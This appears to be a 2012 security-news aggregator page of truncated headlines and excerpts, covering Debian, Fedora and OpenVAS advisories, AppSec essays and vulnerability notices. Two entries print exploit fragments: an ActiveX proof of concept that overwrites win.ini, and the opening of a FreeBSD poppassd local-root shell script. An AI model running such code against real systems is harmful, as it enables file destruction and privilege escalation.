A CISO's Guide To Application Security – Part 4: Weighing AppSec Technology Options

This post is the fourth in a 5-part series on Application Security, or “AppSec”. The series will define the components of a sound AppSec program, delineate the growing threats to software, weigh the costs of a data breach, and outline the CISO’s responsibility in managing software security risk...

Baby Gekko CMS v1.1.5c Multiple Stored XSS Vulnerabilities

Exploit for php platform in category web applications Baby Gekko CMS v1.1.5c Multiple Stored Cross-Site Scripting Vulnerabilities Vendor: Baby Gekko, Inc. Product web page: http://www.babygekko.com Affected version: 1.1.5c Summary: BabyGekko strives to deliver high quality websites and other web...

The hackerproof password? Tips and advice on password management

Having some security expert tell you that you should be creating strong passwords that are unique per account and change frequently is like your dentist telling you that you should floss morning, night and after consuming any dentally dangerous foods. The majority of us say, "yeah right". The tru...

[SECURITY] [DSA 2461-1] spip security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2461-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff April 26, 2012 http://www.debian.org/security/faq -...

Developing and Sharing Tools for Professional Hackers

Professional hackers or security testers tend to write a lot of code. We write exploit code, fuzzers, code to handle esoteric protocols and data structures, unpackers, disassemblers, reversers, parsers, and so much more. We write this code because often what we’re doing is so specific that is...

Debian: Security Advisory (DSA-2453-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2012 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Debian: Security Advisory (DSA-2461-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2012 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

IBM Rational AppScan企业平台验证代码执行漏洞

Bugtraq ID: 53247 CVE ID：CVE-2012-0736 IBM Rational AppScan是一款Web应用的安全测试工具，可以在开发生命周期中进行自动化动态和静态安全漏洞扫描。 IBM Rational AppScan企业版在某些配置下创建扫描作业时存在错误，允许远程攻击者执行任意代码。诱使用户扫描恶意WEB站，可在目标用户系统上执行任意代码。 0 IBM Rational Policy Tester 8.5 IBM Rational AppScan Reporting Console 8.0.1.1 IBM Rational AppScan Reportin...

Quest InTrust Annotation Objects ActiveX Control Add Method Vulnerability

Added: 04/27/2012 BID: 52765 OSVDB: 80662 Background InTrust collects, stores, reports and alerts on event log data from Windows, Unix and Linux systems. Problem Quest Intrust Annotation Objects ActiveX Control AnnotateX.dll is vulnerable to remote code execution due to an input validation error...

DSA-2459-1 quagga - several

Bulletin has no description...

EU Plan to Standardize Punishments Also Could Impact Security Research

While much has been made of recent efforts to provide parity in prosecutions and punishments for cybercrimes across the 27-nation European Union, less has been said about how it may impact security researchers who use the same hacker tools to perform their work. Under a proposal approved recently...

Quest vWorkspace 7.5 Connection Broker Client - ActiveX Control 'pnllmcli.dll 7.5.304.547' SaveMiniLaunchFile() Method Remote File Creation / Overwrite

var obj = new ActiveXObject"PNLLM.Client.1"; obj.SaveMiniLaunchFile"","c:\windows\win.ini";...

Fedora Update for rubygem-actionpack FEDORA-2012-3355

Check for the Version of rubygem-actionpack OpenVAS Vulnerability Test Fedora Update for rubygem-actionpack FEDORA-2012-3355 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or...

FreeBSD Qpopper poppassd latest version local r00t exploit

No description provided by source. !/bin/sh FreeBSD Qpopper poppassd latest version local r00t exploit by kcope tested on FreeBSD 5.4-RELEASE POPPASSDPATH=/usr/local/bin/poppassd HOOKLIB=libutil.so.4 echo "" echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope" echo "" sleep ...

Fedora Update for rubygem-activemodel FEDORA-2011-11386

Check for the Version of rubygem-activemodel OpenVAS Vulnerability Test Fedora Update for rubygem-activemodel FEDORA-2011-11386 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/...

Fedora Update for rubygem-actionpack FEDORA-2012-3321

Check for the Version of rubygem-actionpack OpenVAS Vulnerability Test Fedora Update for rubygem-actionpack FEDORA-2012-3321 Authors: System Generated Check Copyright: Copyright c 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or...

Mutillidae 2.1.17 : Born to be Hacked

Mutillidae 2.1.17 : Born to be Hacked A few days ago an update "Mutillidae" version 2.1.17 was released. Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7...

[SECURITY] Fedora 15 Update: rubygem-actionpack-3.0.5-6.fc15

Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling ea sy unit/integration testing that doesn't require a browser...

[SECURITY] Fedora 16 Update: rubygem-actionpack-3.0.10-3.fc16

Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling ea sy unit/integration testing that doesn't require a browser...

[SECURITY] Fedora 17 Update: rubygem-actionpack-3.0.11-2.fc17

Eases web-request routing, handling, and response as a half-way front, half-way page controller. Implemented with specific emphasis on enabling ea sy unit/integration testing that doesn't require a browser...